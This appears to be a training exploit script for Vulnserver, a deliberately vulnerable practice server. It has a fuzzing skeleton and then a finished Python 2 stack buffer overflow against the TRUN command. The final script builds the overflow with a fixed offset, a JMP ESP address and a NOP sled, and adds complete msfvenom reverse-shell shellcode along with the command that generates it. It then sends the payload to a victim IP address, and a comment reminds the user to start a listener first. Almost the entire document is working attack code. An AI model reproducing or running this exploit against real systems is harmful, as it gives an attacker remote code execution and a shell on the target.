Skeleton :
===============================================================================================
import sys, socket

buff = "TRUN /.:/"

buff += "A" * 3000

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('ip',9000))

print s.recv(1024)

s.send(buff)

s.close()

==================================================================================================




--=-=-=-=-=-=-=-=     FINAL SCRIPT      -=-==-=-=-=-=-==-=-=


#!/usr/bin/python

# FOR VULNSERVER

# Remember to start the listener before sending the exploit.


import socket
import sys
 

buf = "TRUN /.:/" #Command to be sent
    
buf += "A" * 2003   #Bucket Has Become Full

buf += "\xAF\x11\x50\x62"  #PIPE attached : JMP ESP ADDRESS

buf += "\x90" * 10  #NOP for safety

# Below is a shellcode created using msfvenom : ( Remember to add + to the--->  buf =  b""   ---> buf += b"" )
# Shellcode is created using : 
# msfvenom -p windows/shell_reverse_tcp_ LHOST=<kali_ip> LPORT=<port_on_which_nc_is_listening> -b "\x00" -f python -a x86


buf +=  b""
buf += b"\xda\xcc\xba\x9e\x70\xa2\xda\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x5e\x74\x40"
buf += b"\x2f\xa2\x9d\x06\xd0\x5a\x5e\x67\x58\xbf\x6f\xa7\x3e"
buf += b"\xb4\xc0\x17\x34\x98\xec\xdc\x18\x08\x66\x90\xb4\x3f"
buf += b"\xcf\x1f\xe3\x0e\xd0\x0c\xd7\x11\x52\x4f\x04\xf1\x6b"
buf += b"\x80\x59\xf0\xac\xfd\x90\xa0\x65\x89\x07\x54\x01\xc7"
buf += b"\x9b\xdf\x59\xc9\x9b\x3c\x29\xe8\x8a\x93\x21\xb3\x0c"
buf += b"\x12\xe5\xcf\x04\x0c\xea\xea\xdf\xa7\xd8\x81\xe1\x61"
buf += b"\x11\x69\x4d\x4c\x9d\x98\x8f\x89\x1a\x43\xfa\xe3\x58"
buf += b"\xfe\xfd\x30\x22\x24\x8b\xa2\x84\xaf\x2b\x0e\x34\x63"
buf += b"\xad\xc5\x3a\xc8\xb9\x81\x5e\xcf\x6e\xba\x5b\x44\x91"
buf += b"\x6c\xea\x1e\xb6\xa8\xb6\xc5\xd7\xe9\x12\xab\xe8\xe9"
buf += b"\xfc\x14\x4d\x62\x10\x40\xfc\x29\x7d\xa5\xcd\xd1\x7d"
buf += b"\xa1\x46\xa2\x4f\x6e\xfd\x2c\xfc\xe7\xdb\xab\x03\xd2"
buf += b"\x9c\x23\xfa\xdd\xdc\x6a\x39\x89\x8c\x04\xe8\xb2\x46"
buf += b"\xd4\x15\x67\xc8\x84\xb9\xd8\xa9\x74\x7a\x89\x41\x9e"
buf += b"\x75\xf6\x72\xa1\x5f\x9f\x19\x58\x08\xaa\xdf\x7c\xc2"
buf += b"\xc2\xdd\x80\xd6\xc0\x6b\x66\xbc\xf4\x3d\x31\x29\x6c"
buf += b"\x64\xc9\xc8\x71\xb2\xb4\xcb\xfa\x31\x49\x85\x0a\x3f"
buf += b"\x59\x72\xfb\x0a\x03\xd5\x04\xa1\x2b\xb9\x97\x2e\xab"
buf += b"\xb4\x8b\xf8\xfc\x91\x7a\xf1\x68\x0c\x24\xab\x8e\xcd"
buf += b"\xb0\x94\x0a\x0a\x01\x1a\x93\xdf\x3d\x38\x83\x19\xbd"
buf += b"\x04\xf7\xf5\xe8\xd2\xa1\xb3\x42\x95\x1b\x6a\x38\x7f"
buf += b"\xcb\xeb\x72\x40\x8d\xf3\x5e\x36\x71\x45\x37\x0f\x8e"
buf += b"\x6a\xdf\x87\xf7\x96\x7f\x67\x22\x13\x8f\x22\x6e\x32"
buf += b"\x18\xeb\xfb\x06\x45\x0c\xd6\x45\x70\x8f\xd2\x35\x87"
buf += b"\x8f\x97\x30\xc3\x17\x44\x49\x5c\xf2\x6a\xfe\x5d\xd7"


s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  #create socket
s.connect(('10.10.163.178', 9000))   #victim machine ip and port 
print s.recv(1024)   #print the response
s.send(buf)   #send the payload
s.close()    #close the socket
